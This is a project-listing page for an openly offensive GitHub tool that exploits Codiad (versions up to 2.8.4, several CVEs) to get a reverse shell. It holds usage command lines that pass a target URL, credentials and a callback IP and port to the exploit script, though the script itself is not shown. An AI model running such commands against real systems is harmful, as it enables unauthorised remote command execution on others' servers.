All Projects → WangYihang → Codiad-Remote-Code-Execute-Exploit

WangYihang / Codiad-Remote-Code-Execute-Exploit

Licence: other
A simple exploit to execute system command on codiad

Programming Languages

python
139335 projects - #7 most used programming language

Codiad-Remote-Code-Execute-Exploit

Description

A simple exploit to execute system command on Codiad This tool will exploit the vuln Codiad application to get a reverse shell

CVE

  • CVE-2017-11366
  • CVE-2017-15689
  • CVE-2018-14009 (0 Day exploitation)

Effected Version

<=2.8.4 (latest version)

Effected Environment

Windows
Linux

Usage :

Usage : 
        python exploit.py [URL] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]
        python exploit.py [URL:PORT] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]
Example : 
        python exploit.py http://localhost/ admin admin 8.8.8.8 8888 linux
        python exploit.py http://localhost:8080/ admin admin 8.8.8.8 8888 windows
Author : 
        WangYihang <[email protected]>

Example videos

Example GIFs

Windows

Windows

Linux

Linux

Acknowledgement

@mhaskar (Give suggestions for Windows platform exploitation)

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].